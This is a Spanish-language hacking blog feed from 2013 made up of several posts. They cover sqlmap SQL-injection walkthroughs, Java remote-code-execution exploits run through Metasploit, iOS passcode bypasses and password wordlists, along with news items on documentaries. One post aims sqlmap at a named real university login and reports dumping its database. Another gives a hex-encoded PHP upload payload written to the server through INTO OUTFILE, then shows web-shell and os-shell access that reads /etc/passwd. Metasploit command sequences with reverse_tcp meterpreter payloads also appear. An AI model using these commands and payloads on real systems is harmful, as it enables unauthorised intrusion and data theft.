A6–Sensitive Data Exposure	Many web applications do not properly protect sensitive data, such as credit cards, tax ids, and authentication credentials. Attackers may steal or modify such weakly protected data to conduct identity theft, credit card fraud, or other crimes. Sensitive data deserves extra protection such as encryption at rest or in transit, as well as special precautions when exchanged with the browser.
A7–Missing Function Level Access Control	Virtually all web applications verify function level access rights before making that functionality visible in the UI. However, applications need to perform the same access control checks on the server when each function is accessed. If requests are not verified, attackers will be able to forge requests in order to access unauthorized functionality.
A8-Cross-Site Request Forgery (CSRF)	A CSRF attack forces a logged-on victim’s browser to send a forged HTTP request, including the victim’s session cookie and any other automatically included authentication information, to a vulnerable web application. This allows the attacker to force the victim’s browser to generate requests the vulnerable application thinks are legitimate requests from the victim.
A9-Using Components with Known Vulnerabilities	Vulnerable components, such as libraries, frameworks, and other software modules almost always run with full privilege. So, if exploited, they can cause serious data loss or server takeover. Applications using these vulnerable components may undermine their defenses and enable a range of possible attacks and impacts.
A10–Unvalidated Redirects and Forwards	Web applications frequently redirect and forward users to other pages and websites, and use untrusted data to determine the destination pages. Without proper validation, attackers can redirect victims to phishing or malware sites, or use forwards to access unauthorized pages.

Más información: https://www.owasp.org/

SQLi utilizando método POST con SQLMap

noreply@blogger.com (Caleb Bucker) — Tue, 26 Mar 2013 19:13:09 PDT

En esta entrada breve y simple, se detallaran los pasos que realizaremos cuando necesitemos explotar una vulnerabilidad de Sql Injection, que mayormente se encuentran en algunos servidores basados en SQL Server y Oracle. Estas vulnerabilidades son típicas en los LOGIN'S Administrativos, ya que como debemos de saber, que cuando ingresamos el usuario y password estos datos se envían a través del método POST, por lo tanto puede existir la posibilidad de que al ingresar datos falsos o algunos bypasses, esta nos pueda mostrar algún error que nos permita identificar la vulnerabilidad, por tanto se puede explotar automatizadamente utilizando SQLMAP ejecutando comandos para enviar la petición en POST y no en GET como se "acostumbra".

Si no me explique bien, pues al buen entendedor pocas palabras!!! entonces sin mas rodeos, vamos a la acción!

Tenemos un LOGIN en ASP, en la cual no tenemos los datos correctos ni nada por el estilo, ya que no hemos encontrado ningún tipo de vulnerabilidad en el servidor que nos brinde estos datos, por tanto como somos curiosos e inteligentes empezamos a probar datos falsos y algunos bypasses como el famosillo ' or '1'='1 como se muestra en la imagen siguiente:

Después de haber colocado este bypass, tenemos la posibilidad de que el servidor nos muestre algún tipo de vulnerabilidad o el error que nos permita identificar si es vulnerable a SQL Injection, tanto así que si el servidor se encuentra bajo ASP esta nos puede mostrar el error "Microsoft OLE DB Provider for ODBC Drivers error '80040e14'", si esto llega a suceder, corremos la suerte de poder explotar esta vulnerabilidad. En este caso después de haber colocado dicho bypass, el servidor nos devuelve el siguiente error:

Al visualizar esta vulnerabilidad, somos consciente que se puede explotar manualmente o automatizadamente, para así obtener los datos que nos permita logearnos de una manera correcta al servidor.

Ahora, para seguir probando si el LOGIN tiene algún otro tipo de vulnerabilidad, regresamos al form y dejamos en blanco el usuario y clave y le cliqueamos en Conectar, la cual el servidor nos muestra lo siguiente:

¿Algo raro cierto? ¿Por que? ... Este LOGIN nos demuestra que las peticiones no están validadas, quiere decir que si colocamos algún bypass, esta nos muestra una vulnerabilidad, como también si dejamos los form en blanco y cliqueamos en conectar, esta nos permite saltarnos del login.

Bien, después de haber llegado a unas pequeñas conclusiones sobre que el servidor tiene una vulnerabilidad en el login y que las peticiones no están validadas, procederemos a utilizar el Live HTTP Headers para así ver las cabeceras del login al momento que cliqueemos en Conectar.

En este caso después de haber colocado el Live HTTP Headers a la escucha de lo que pasa por el servidor mientras cliqueamos en Conectar dejando todo el blanco, esta nos devuelve lo siguiente:

Hemos obtenido 3 datos muy importantes! las cuales son:

http://www.uap.edu.pe/intranet/logon2.asp
POST /intranet/logon2.asp HTTP/1.1
usuario=&pw=&user=07&B7=++Conectar++

La primera es posiblemente la URL Vulnerable, la segunda nos indica que la variable es POST y el ultimo, los parámetros que posiblemente son vulnerables.

Entonces procederemos a explotar la vulnerabilidad automatizadamente que se encuentra en el LOGIN, utilizando SQLMAP y ejecutando el siguiente comando basándonos en los datos obtenidos por el Live HTTP Headers.

./sqlmap.py -u "http://www.uap.edu.pe/intranet/logon2.asp" --data="usuario=&pw=&user=07&B7=++Conectar++" -p "usuario" --level=5 --risk=5 --dbs

Después de que la herramienta termine de auditar el servidor, esta detectara que el parámetro POST "usuario" es vulnerable, tal cual se muestra en la siguiente imagen:

A partir de allí, ya sabemos que dicho LOGIN es realmente vulnerable y lo hemos explotado con total satisfacción obteniendo así toda la base de datos del servidor.

Ahora si! con esta DB obtendremos los respectivos datos reales para poder logearnos satisfactoriamente en el LOGIN que tanto deseamos ;)

Espero les sirva.

Saludos.

@CalebDrugs

Saltarse la contraseña (passcode) en iPhone 4 con iOS 6.1.3

noreply@blogger.com (Zion3R) — Sun, 24 Mar 2013 12:48:10 PDT

Hace más un mes publiqué un bug donde se podía evadir fácilmente la (contraseña) passcode de los dispositivos con iOS 6.1, recientemente para arreglar dicha vulnerabilidad es que ha salido el iOS 6.1.3, pero tan pronto como salió es que se encontró una forma de saltarse la pantalla de bloqueo del iPhone 4.

El fallo se produce sólo en los terminales que no tienen Siri, es decir, hasta iPhone 4, y no en iPhone 4S o iPhone 5, y vuelve a producirse al generarse el evento de No SIM cuando se realiza una llamada con el Control de voz.

Como en otras ocasiones, este bug no permite acceder a todo el sistema operativo, pero sí que permite acceder a la agenda de contactos y las fotografías. Lo peor de todo es el mal ruido que genera entre la opinión pública al ver que Apple arregla un fallo e introduce otro similar.

Fuente:

Kali Linux, Nueva Distribución de Pentesting de los creadores de Backtrack

noreply@blogger.com (Zion3R) — Wed, 13 Mar 2013 11:08:15 PDT

Hace ya algún tiempo se anunciaba en el blog oficial de Offensive Security (creadores de Backtrack) que saldría una nueva Distribución GNU/linux de Pentesting que se llamaría Kali, esta es descrita por sus mismo creadores como la más avanzada, robusta y estable distribución para Pentesting a la fecha.

Kali Linux ya está disponible para su descarga y trae consigo más de 300 herramientas de pentesting, han cambiado el entorno de Bactrack basado en Ubuntu 10.04 LTS por un sistema Debian y ahora trae soporte para ARM.

Descarga Kali Linux v1.0

Página oficial: http://www.kali.org/
Documentaciòn en Español: http://es.docs.kali.org/introduction-es
Repositorios Git: http://git.kali.org/gitweb/

Diccionarios para Realizar Ataques de Fuerza Bruta - Brute Forcing Word List Resources

noreply@blogger.com (Zion3R) — Tue, 05 Mar 2013 16:16:27 PST

Hace un tiempo hice una lista con Diccionarios para Realizar Ataques de Fuerza Bruta, pero algunos links ya no funcionaban y además que tengo nuevos diccionarios que les pueden interesar, sin más que decir, les dejo una recopilación bastante buena:

Crackstation.net ha realizado 2 diccionarios, uno es "pequeño" y descompreso pesa 684 MB y el otro diccionario es mucho más grande y compreso pesa 9.2 GB, descompreso pesa nada más que 15 GB.

WordList 15 GB:

WordList 684 MB:

Aquí les dejo una colección de diccionarios que está en TPB y que es bastante completa:

WordLists 1.9 MB:

Torrent

Por último dejo la una lista con 10 Webs donde se pueden encontrar diccionarios "sueltos" de menos peso y variadas temáticas a gusto:

Lugar	Web	Descripción	Formatos
1°	www.skullsecurity.org	En la web se pueden encontrar las 500 pass más usadas, amplia variedad de diccionarios (por idiomas, actores, porno, etc...), nombres sacados de facebook, también tiene una lista con la localización de archivos (linux, windows), extenciones de aplicaciones web (phpmyadmin, apache, phpbb etc...), sin duda es la web más completa que he visto para encontrar el diccionario específico que buscamos para fuerza bruta.	.txt.bz2 .txt
2°	www.insidepro.com	Trae consigo diccionarios por idiomas y algunos hecho por la web misma web (InsidePro), también trae el mítico diccionario de milw0rm.com y uno de hashkiller.com, además también trae un compacto con los nombres de Facebook. A mi personalmente me gusta mucho por que es muy ordenada y clara la web.	.rar -> .dic
3°	packetstormsecurity.org	Aquí se puede encontrar diccionarios de los que se les ocurra (asteriodes, rock, mitos y leyendas, cine, jazz, nombres, etc...). El único problemas es que tienes que buscarlos en una larga lista sin orden lógico.	.txt .txt.gz
4°	www.cotse.com	Una web que ofrece muchos tópicos: Contraseñas comunes, los términos de Drogas de la calle, nombres de host, las palabras de la Biblia King James, palabras en latín, Minix / usr / dict, nombres de películas, música clásica, música country, jazz, música de otros, la música rock, espectáculos musicales, mitos y leyendas , apellidos de actores, nombres de actor, apellidos anglosajones, entre muchos otros. Nada más un poco molesto el desorden.	*
4°			*
5°	ftp.openwall.com	Este es el conocido FTP de Openwall que trae un compacto de passwords y una amplia variedad de diccionarios por idiomas.	*.gz
6°	ftp.cerias.purdue.edu	FTP muy parecido a los 2 anteriores que trae consigo entre sus variedades: idiomas, literatura, movieTV, lugares, nombres, random, religión, computador, ciencia.	*.gz
7°	contest.korelogic.com	Aquí se pueden encontar diccionarios con 2 letras de combinaciones, nombres de ciudades, equipos de football, nombres sacados de Facebook, palabras sacadas de la Wiki (según idioma), etc...	.dic .dic.gz *.txt
8°	www.leetupload.com	Este es otro servidor con recopilación de diccinarios.	.zip .rar *.txt
9°	ftp.funet.fi	FTP con diccionarios por idiomas.	.Z
10°	wordlist.sourceforge.net	Aquí hay una recopilación muy poco completa, pero útil igual.	.tar.gz .zip

[+] Salu2
[+] Zion3R

Otro 0day en Java permite Ejecución de Código Remoto (Video MSF)

noreply@blogger.com (Zion3R) — Mon, 25 Feb 2013 19:18:09 PST

Hace más de un mes que se publicó un Grave 0day en Java que permitía la Ejecución de Código Remoto. Lo cual fue noticia mundial ya que grandes empresas como Apple recomendaron dejar de usar Java, e incluso el gobierno de EEUU llamó a desinstalar por completo Java, ya que era una amenaza real y latente que se dilató en parchar.

Recientemente (18-01-2013) fue descubierta una nueva vulnerabilidad (CVE-2013-0431 Java Applet JMX Remote Code Execution) que es muy parecida a la anterior (incluso parece ser una secuela) que nuevamente afecta al SandBox.

La versiones afectadas son Java SE 7 Update 11 y anteriores, ya está parcahdo oficialmente, pero aun existen una gran mayoría que todavía no actualiza Java.

Lo chicos de Metasploit han hecho un trabajo sorprendente como siempre, y ya han publicado (el 25-02-2013) el módulo que explota la vulnerabilidad, aquí un video demostrativo:

use exploit/multi/browser/java_jre17_jmxbean_2
set SRVHOST 192.168.178.26
set TARGET 1
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.26
exploit

getuid
sysinfo

Video: http://eromang.zataz.com/

Saltándose la Contraseña de un iOS 6.1 (Forma II) (Video)

noreply@blogger.com (Zion3R) — Tue, 26 Feb 2013 06:06:32 PST

Hace muy poco en la entrada Saltándose la Contraseña de un iOS 6.1 (Video) se exponía como bypassear la contraseña de un dispositivo con iOS 6.1, pero recientemente me entero por Cyberhades que existe otro método para saltarse la pantalla de bloqueo de iOS 6.1, que es muy parecido al anterior, pero esta vez se conecta el teléfono vía USB y se puede volcar los datos (sincronizar con iTunes) del terminal.

El procedimiento es el siguiente:

Pulsa el botón de encendido.
Llamada de emergencia
Llama a cualquier número (3 dígitos sólo?) y cancela la llamada inmediatamente
Pulsa de nuevo el botón de encendido y justo después pulsa el botón del terminal (cuadrado).
Ahora pulsa el botón de encendido de nuevo por 3 segundos, al tercer segundo pulsa el botón de teléfono y manteniendo éste pulsado, toca el botón de emergencia.
Una vez que tienes los 3 botones pulsados, suelta el del teléfono (cuadrado) y después el de encendido.
En este momento si has seguido los pasos correctamente, la pantalla se habrá puesto en negra.
Conecta tu terminal vía USB a tu sistema y espera que se sincronicen las fotos, contacto, etc sin necesidad de introducir ningún código PIN.

Video demostrativo:

Fuente:http://arstechnica.com/
Vía: http://www.cyberhades.com/

Actualización:

Por Seguridad Apple nos enteramos que este método solo sirve si alguna vez habías hecho "pairing" antes entre el dispositivo y tu Apple iTunes.

En el vídeo se puede comprobar que el terminal está "pairing" con la computadora que está utilizando, es decir, que Apple iTunes ya tiene guardadas las claves de una conexión anterior desbloqueada, por lo que no está consiguiendo desbloquear el sistema de ficheros - a pesar de que hayan dejando la pantalla en negro por culpa del fallo conocido -.

The Pirate Bay - Away From Keyboard (Documental, Subtítulos en Español)

noreply@blogger.com (Zion3R) — Sat, 23 Feb 2013 10:50:00 PST

Acabo de ver este documental que salió hace poco en Inglés, y ahora se encuentra subtitulado. En este se relata el mundo que envuelve a The Pirate Bay, en donde se muestra el caso judicial contra TPB, que incluye sentencias, apelaciones y redadas, que se convirtió en poco tiempo en uno de los acontecimientos más relevantes en el debate sobre los derechos de propiedad intelectual y el intercambio libre de archivos, como lo fueron el caso de Napster hace más de una década atrás y los últimos sucesos con Kim Dot Com o la muerte de Aaron Swartz hace unas pocas semanas.

El nombre del documental se basa en que lo integrantes de TPB prefieren llamar a los encuentros físicos "AFK", Away from Keyboard en vez de "IRL" (In Real Life), porque ellos consideran que Internet también es real. El documental dura 1 hora y 20 minutos, pero les recomiendo 100% que lo vean:

También disponible vía torrent:
https://thepiratebay.se/user/SimonKlose/

Descargar The Pirate Bay

Por otro lado y hablando del mismo tema, los mismo chicos de TPB han liberado 2 archivos con un respaldo completo del sitio The Pirate Bay, el primer archivo está optimizado y pesa solamente 76 MB, contiene solamente los nombres y los torrent links, lo puedes descargar de aquí. El segundo archivo es lo mismo, pero este contiene toda la información de los seeders y leechers (los que están descargando en ese momento), nombres, torrent links, descripción, tamaño y comentarios, pesa 631 MB y lo pueden descargar de aquí.

[+] Salu2

[+] Zion3R

Cómo Instalar Metasploit en iOS 6.1 (Video)

noreply@blogger.com (Zion3R) — Fri, 22 Feb 2013 13:04:37 PST

Si tienes un Ipad o un Iphon este vídeo te puede interesar. Recientemente Japtron (Gracias por su contribución) me ha enviado un vídeo donde explica fácilmente como instalar Metasploit en un dispositivo con iOS 6.1.

Sin más que decir les dejo con el vídeo:

Saltándose la Contraseña de un iOS 6.1 (Video)

noreply@blogger.com (Zion3R) — Tue, 19 Feb 2013 14:54:17 PST

Recientemente se ha descubierto una manera de saltarse la pantalla de bloqueo (lockscreen) que tiene una contraseña numérica de 4 dígitos (como se ve en la imagen) de los dispositivos Apple (como el iPhone) con iOS versión 6.1 (la última versión) y de esa manera poder acceder al dispositivo sin haber ingresado ningún tipo de contraseña o passcode.

El método consta en hacer una llamada de emergencia, colgar y luego pulsar el botón de encendido hasta que se apague la pantalla, soltarlo y luego volver a pulsar dicho botón otra vez y desbloquear.

Esto salta el sistema del terminal donde se puse acceder a las aplicaciones, ver y modificar contactos, acceder al buzón de voz y acceder a las fotos a través de añadir un nuevo contacto (seleccionar foto para el nuevo contacto).

Aquí 2 vídeos de demostración:

Este fallo es muy semejante a uno que afectó a la versión 4.1 de iOS hace algún tiempo, pero que al parecer vuelve a surgir.

Bueno, nunca está demás saberse este truco para por ejemplo encontrar al dueño de algún iPhone perdido, o para simplemente jugar alguna broma.

Fuente: http://www.theverge.com/
Vía: http://www.cyberhades.com/

WikiRebels - Wikileaks: Con la Filtración como Arma (Documental Subtitulado)

noreply@blogger.com (Zion3R) — Fri, 22 Feb 2013 12:21:09 PST

En menos de un año Wikileaks ha pasado de ser un sitio web en lugar oscuro a un actor político global, dando forma a la historia del mundo y los acontecimientos, al revelar documentos secretos sobre crímenes de guerra, la corrupción corporativa y las sombras de las relaciones políticas internacionales.

Los reporteros Jesper Huor y Bosse Lindquist de la televisión sueca ha viajado a varios países para conocer al personal de Wikileaks. Se han hecho varias entrevistas en profundidad con su enigmático editor jefe, Assange Julián, a quien algunos ven como un defensor de la libertad, otros como un espía y violador. Pero también se han reunido varias personas clave detrás de Wikileaks - los geeks y los periodistas. Además de los opositores Wikileaks.

Hoy, después del alto perfil de seriedad de varias filtraciones acerca de los Estados Unidos, Wikileaks es una organización en peligro. EE.UU. aumenta la presión y la rebelión ha llevado al nacimiento de otra plataforma para las filtraciones, con sede en Alemania, Openleaks.

Wikileaks se está convirtiendo en una organización de peso. Hasta el primer ministro israelí, Binyamin Netanyahu, ha afirmado que los documentos dan la razón a su Gobierno en la valoración de la amenaza iraní.

Click en el primer icono para activar subtítulos en español.

Investigación: Päivi Suhonen , Johannes Wahlström, Armin Turkanovic
Productores: Bosse Lindquist, Huor Jesper
Fotografía: Lars Granstrand, Sven Lindahl
Montaje: Michael Hallberg
Jefe de proyecto: Johan Branstad
Producción: SVT
País de producción: Suecia
Año: 2010
Duración: 57 min.

Fuente: http://www.naranjasdehiroshima.com/

Inj3ct0r (1337day) Hackeado por Injector & Sec4ever Team

noreply@blogger.com (Zion3R) — Mon, 28 Jan 2013 11:45:49 PST

Hace un tiempo atrás Inj3ct0r (1337day) había hackeado a ExploitHub y había robado la base de datos con más de 200 exploits Privados que comercializaban, poniéndolos en breve en su propia web. Al parecer Inj3ct0r ha recibido un poco de su propia medicina y ha sido "hackeado" por el grupo Injector & Sec4ever.

Al parecer es un simple cambio en el DNS, ya que los dominios 1337day.org y 1337day.net nos dirigen a un index alojado en hosting24.com hosting gratuito y que no tiene relación alguna con los servidores de Inj3ct0r.

Por el momento es difícil informar más ya que ninguno de los 2 "Teams" se ha pronunciado hasta el momento, más allá del index que dejaron los atacantes, Injector & Sec4ever. De existir un compromiso serio, se podrían filtran varios exploits privados que guarda Inj3ct0r y liberar los que se venden, es todo especulación por el momento.

[+] Salu2

[+] Zion3R

2 Graves vulnerabilidades en Java permite Ejecución de Código Remoto, Java Applet AverageRangeStatisticImpl & Method Handle (Videos MSF)

noreply@blogger.com (Zion3R) — Wed, 23 Jan 2013 19:46:07 PST

Hace muy poco que se había descubierto un Grave 0day en Java que permitía a un atacante tomar el control de un sistema, esto trajo muchos inconvenientes tanto por parte de Oracle como de los usuarios de Java, llego el punto en que se recomendó por parte del gobierno de EE.UU a desactivar Java o simplemente eliminarlo por los potenciales perjuicios a los sistemas con Java corriendo.

Otro problema fue la tardanza de un parche oficial por parte de Java, pero tan rápido como salió el parche arreglando el 0day, aparecieron voces diciendo que no estaba bien parchado y que aun era posible explotar el bug. A todos estos inconvenientes sumemosle el hecho de que se empezaron a comercializar por internet 2 nuevas vulnerabilidades en Java...

Recientemente (01-22-2013) Metasploit proporcionado los módulos que explotan estos 2 bugs, y aquí los dejo con las especificaciones y los videos de explotación con Metasploit:

CVE-2012-5076 Java Applet AverageRangeStatisticImpl:

Este módulo abusa de AverageRangeStatisticImpl a partir de un Applet de Java para ejecutar código arbitrario fuera del sandbox de Java, este es otro vector de ataque descubierto y parchado en noviembre de 2012, pero que renace de las cenizas. Las versiones de Java afectadas son Oracle Java version 7 Update 7 y anteriores.

use exploit/multi/browser/java_jre17_glassfish_averagerangestatisticimpl
set SRVHOST 192.168.178.26
set TARGET 1
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.26
exploit

getuid
sysinfo

CVE-2012-5088 Java Applet Method Handle:

Este módulo es parecido al anterior, pero abusa de Method Handle class a partir de un Applet de Java para ejecutar código arbitrario fuera del sandbox de Java. Las versiones de Java afectadas son Oracle Java version 7 Update 7 y anteriores.

use exploit/multi/browser/java_jre17_method_handle
set SRVHOST 192.168.178.26
set TARGET 1
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.26
exploit

getuid
sysinfo

Al actualizar Metasploit los módulos se agregaran automáticamente, igualmente les dejo los módulos:

Videos:

Más Información: https://community.rapid7.com/

Grave 0day en Java permite Ejecución de Código Remoto (Video MSF)

noreply@blogger.com (Zion3R) — Fri, 11 Jan 2013 07:25:17 PST

Recientemente (PoC proporcionado el 10/01/2013) se ha detectado un ~~(muy)~~ grave 0day en Oracle Java SE 7 Update 10, que es la última versión disponible de Java. Lo que lo hace muy peligroso para todos los usuarios de Windows, Linux y Mac, ya que no existe parche alguno que arregle esta vulnerabilidad.

El alcance de esta vulnerabilidad es crítica ya que la mayoría (por no decir todos) de los computadores tienen instalado Java por los beneficios que nos proporciona. Lo que lo transforma en un 0day muy peligroso y muy codiciado por los potenciales atacantes, es más, en estos momentos ya se está usando para fines malicioso, por lo demás, pronto será parchado y si quieren sacarle provecho más vale que lo hagan pronto.

La solución óptima en estos momentos es desactivar Java hasta que Oracle proporcione una actualización con el correspondiente parche que arregle este 0day.

Como siempre Metasploit ha hecho su trabajo y ya se dispone de un módulo que lo explota, así que aquí les dejo con un video de explotación con Metasploit:

use exploit/multi/browser/java_jre17_jmxbean
set SRVHOST 192.168.178.26
set TARGET 1
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.26
exploit

sysinfo
getuid

Video: http://eromang.zataz.com/

Más Info:
http://www.cve.mitre.org/
http://osvdb.org/89059
http://malware.dontneedcoffee.com/

[+] Salu2

Conseguir Shell por SQLi con SQLMap

noreply@blogger.com (Caleb Bucker) — Thu, 10 Jan 2013 17:09:41 PST

Hace algunos días auditando un Servidor Web (universidad) basada en Apache 1.3.26, PHP 4.2.1 a un cliente, me tope con la típica vulnerabilidad de Inyección de Código Sql, la cual permite fácilmente obtener toda la base de datos del servidor, entonces de inmediato empece a inyectar manualmente pero para mi suerte!!! ninguna de las inyecciones y bypasses dio resultado, entonces me pregunte ¿Por que? si es una vulnerabilidad peligrosa y fácilmente explotable, pero luego analizando nuevamente di con el resultado que era un simple FP (falso positivo).

Después de terminar el nuevo análisis encontré otra vulnerabilidad de Inyección de Código Sql, mostrándome el famoso error:

----------------------------------------------------------------------------------

You have an error in your SQL syntax near '' order by gal_id desc limit 5' at line 1

----------------------------------------------------------------------------------

Entonces basándome en el resultado anterior del FP, decidí utilizar la famosa herramienta SQLMap para comprobar si realmente el sitio era vulnerable a esta inyección para ello use el comando mas simple pero muchas veces eficiente que cuenta SQLMap:

./sqlmap.py -u http://www.sitio-web.com/parametro-vulnerable?txt_palabra=isep --dbs

Pero para mi mayor suerte! la herramienta devolvió el siguiente resultado:

A partir de ese error empece a preocuparme! pues el cliente necesitaba el trabajo lo mas antes posible, pero como para mi no hay nada imposible (sin presumir), opte por utilizar las técnicas y comandos mas avanzados que cuenta SQLMap, pero antes de eso tenia que comprobar si el usuario que estaba inyectando era user o root, para ello utilice el siguiente comando:

./sqlmap.py -u http://www.sitio-web.com/parametro-vulnerable?txt_palabra=isep --current-user

Obteniendo el siguiente resultado:

Al apreciar el resultado como "none" deduje que el usuario era "root" entonces en lo primero que pensé fue en subir una web shell desde SQLMap, pero antes de realizar ese paso, tenia que obtener un Full Path Disclosure pero ¿Para que necesito un FPD? muy facil, al momento que necesitemos subir una web shell desde SQLMap, esta nos pedirá que coloquemos el PATH completo del servidor, caso contrario esta no dará resultado.

Ejemplos de obtener un Full Path Disclosure mediante Sql Injection:

http://www.sitio-web.com/parametro-vulnerable?txt_palabra=isep Veremos un Sql Injection
http://www.sitio-web.com/parametro-vulnerable?txt_palabra=[]isep Veremos un Full Path Disclosure
http://www.sitio-web.com/parametro-vulnerable?txt_palabra=huey Veremos un Full Path Disclosure
http://www.sitio-web.com/parametro-vulnerable?txt_palabra=isep! Veremos un Full Path Disclosure
http://www.sitio-web.com/parametro-vulnerable?txt_palabra='isep' Veremos un Full Path Disclosure

Otro método que también funciona para obtener un FPD es cambiando las cookies, por ejemplo si tenemos nuestras cookies PHPSESSID=13882931834931984318 simplemente queda borrar los números quedando solamente el PHPSESSID= esto se puede realizar utilizando el Addon Live HTTP Headers

Después de realizar estos pasos para obtener un Full Path Disclosure, el resultado fue exitoso, mostrándome el siguiente mensaje:

----------------------------------------------------------------------------------

Warning: mysql_num_rows(): supplied argument is not a valid MySQL result resource in /espejo/htdocs.v2/portalnuevo/buscadores/portal_contenidos.php on line 79

----------------------------------------------------------------------------------

Conociendo el path completo del servidor, solo me faltaba buscar el código php de un upload para convertirlo en HEX e inyectarlo en el SQLMap. Seguidamente tenia que convertir el siguiente código a HEX:

----------------------------------------------------------------------------------

----------------------------------------------------------------------------------

Ahora entre al sitio web http://www.string-functions.com/string-hex.aspx y coloque el código del upload para convertirlo a HEX, dando como resultado lo siguiente:

----------------------------------------------------------------------------------

3c666f726d20656e63747970653d226d756c7469706172742f666f726d2d646174612220616374696f6e3d2275706c6f61642e70687022206d6574686f643d22504f5354223e3c696e707574206e616d653d2275706c6f6164656466696c652220747970653d2266696c65222f3e3c696e70757420747970653d227375626d6974222076616c75653d2255706c6f61642046696c65222f3e3c2f666f726d3e0d0a3c3f70687020247461726765745f706174683d626173656e616d6528245f46494c45535b2775706c6f6164656466696c65275d5b276e616d65275d293b6966286d6f76655f75706c6f616465645f66696c6528245f46494c45535b2775706c6f6164656466696c65275d5b27746d705f6e616d65275d2c247461726765745f7061746829297b6563686f20626173656e616d6528245f46494c45535b2775706c6f6164656466696c65275d5b276e616d65275d292e2220686173206265656e2075706c6f61646564223b7d656c73657b6563686f20224572726f7221223b7d3f3e

----------------------------------------------------------------------------------

Realizado todo lo anterior, entre nuevamente a SQLMap y coloque el siguiente comando para moverme por el servidor mediante comandos SQL.

./sqlmap.py -u http://www.sitio-web.com/parametro-vulnerable?txt_palabra=isep --sql-shell

Ahora como ya tenia el control del servidor mediante comandos SQL, tenia que inyectar con SELECT + 0x + Codigo HEX + INTO OUTFILE + Full Path + Nombre del Upload, quedando la inyección de la siguiente manera:

----------------------------------------------------------------------------------

select 0x3c666f726d20656e63747970653d226d756c7469706172742f666f726d2d646174612220616374696f6e3d2275706c6f61642e70687022206d6574686f643d22504f5354223e3c696e707574206e616d653d2275706c6f6164656466696c652220747970653d2266696c65222f3e3c696e70757420747970653d227375626d6974222076616c75653d2255706c6f61642046696c65222f3e3c2f666f726d3e0d0a3c3f70687020247461726765745f706174683d626173656e616d6528245f46494c45535b2775706c6f6164656466696c65275d5b276e616d65275d293b6966286d6f76655f75706c6f616465645f66696c6528245f46494c45535b2775706c6f6164656466696c65275d5b27746d705f6e616d65275d2c247461726765745f7061746829297b6563686f20626173656e616d6528245f46494c45535b2775706c6f6164656466696c65275d5b276e616d65275d292e2220686173206265656e2075706c6f61646564223b7d656c73657b6563686f20224572726f7221223b7d3f3e

into "/espejo/htdocs.v2/portalnuevo/buscadores/upload.php";

----------------------------------------------------------------------------------

En la cual SQLMap devuelve el siguiente resultado, indicando que el upload subió perfectamente sin problema alguno, como se muestra en la siguiente imagen:

Ahora solo me quedaba abrir mi navegador y dirigirme a la ruta en la cual subí el upload.php la cual fue totalmente un éxito.

Bien ahora como ya tenia el upload.php y mi objetivo era obtener el control total del servidor, subi una web shell la cual se ejecuto perfectamente.

----------------------------------------------------------------------------------

Como ya es de conocimiento SQLMap contiene una series de comandos que nos ayuda mucho al momento que estamos realizando una auditoria, pues también ofrece un comando para subir una web shell de una forma mas rápida a la forma de dicha herramienta.

El comando --os-shell en SQLMap permitirá subir un uploader (sqlmap file uploader) algo parecido a lo anterior pero al estilo SQLMap :)

Para realizar este paso utilizando dicho comando, teclearemos en la herramienta lo siguiente:

./sqlmap.py -u http://www.sitio-web.com/parametro-vulnerable?txt_palabra=isep --os-shell

La herramienta nos preguntara en que lenguaje de programación esta basada el sitio web, en este caso el sitio web que ando auditando esta en PHP, por lo que sqlmap lo enumera como (default) tal cual se muestra en la siguiente imagen:

Después de colocar el numero por default o simplemente presionando enter, la herramienta nos pedirá que coloquemos el path completo del servidor la cual hemos obtenido mediante un Full Path Disclosure, después de ello, confirmaremos dicho path para que la herramienta trate de subir el uplader en el servidor.

Seguidamente si hemos colocado el path correctamente, obtendremos el uploader en el servidor, esta se nombra muchas veces como tmpjdjsk.php.

Ahora para confirmar y visualizar el uploader que subió la herramienta, abriremos la URL que la misma nos proporciono, apreciando-la de la siguiente manera:

Desde allí podemos subir nuestra web shell o cualquier archivo que nos gustaría tener dentro del servidor web.

Después que la herramienta ha realizado todo lo anterior, nos deja una session del os-shell para movernos por el servidor mediante comandos como ls - dir - cat u otros. Esto se puede ya que en si es un backdoor que SQLMap ha subido al servidor.

Ejemplo del comando cat /etc/passwd:

Ejemplo del comando uname -a y ls:

Y por ultimo la web que hemos auditado ha quedado totalmente vulnerado.

Bueno, esto fue lo que me paso hace algunos dias, lo escribo no tal solo por aburrirlos, si no para que quiza alguno de ustedes lo ponga en practica en sus Pruebas de Penetración.

Espero les sirva, un saludo y hasta la próxima ;)

FollowMe: https://twitter.com/CalebDrugs

Manual de HashCat en Español (PDF)

noreply@blogger.com (Zion3R) — Wed, 09 Jan 2013 10:17:10 PST

Es muy común buscar algún hash MD5 en famosas bases de datos y no encontrarlo... Peor aun es cuando se tiene algún hash WordPress u otro con algún salt, y no hay buenas bases de datos o simplemente no hay. Pero no hay que darse por vencido, pues puedes usar la potencia de tu computador para crackear tu mismo los hash's.

Para esta tarea la herramienta que considero mejor es HashCat ya que es muy rápida, eficiente y se puede guardar tu trabajo avanzado para seguir en otro momento.

Recientemente MEXICANH TEAM ha publicado un completo manual de HashCat donde se explica con lujos de detalles y en español como usar esta completa y extensa herramienta que es capaz de crackear más de 30 algoritmos de encriptación.

Aquí les dejo el index del manual y al final el link de descarga:

AVISO LEGAL ................................................................. 3
ACERCA ...................................................................... 4
1.1 VISTA GENERAL ........................................................... 5
1.2 OPCIONES ................................................................ 7
1.3 VECTORES DE ATAQUE ...................................................... 15
1.4 EJEMPLOS ................................................................ 16
1.5 ESPECIFICOS HASHCAT ..................................................... 25
2.1 OCLHASHCAT-PLUS(CUDAHASHCAT-PLUS) ....................................... 25
2.1 OPCIONES ................................................................ 27
2.2 VECTORES DE ATAQUE ...................................................... 34
2.3 RULE-BASED ATTACK ....................................................... 35
2.4 EJEMPLOS ................................................................ 39
2.5 HASHCAT UTILS ........................................................... 48
2.6 SOLUCION DE PROBLEMAS ................................................... 50
2.7 REFERENCIAS ............................................................. 50
2.8 MEJORAS ................................................................. 50

Descarga Manual de HashCat en Español (PDF)
Formato: PDF
Páginas: 50
Peso: 2,58 MB

[+] Salu2
[+] Zion3R

Feliz Año Nuevo y Próspero 2013!!

noreply@blogger.com (Zion3R) — Sun, 27 Jan 2013 18:47:14 PST

Quiero saludar y desearles lo mejor en este 2013 a todos mis lectores, para mi es un gusto escribir y espero poder seguir haciéndolo a lo largo del año.
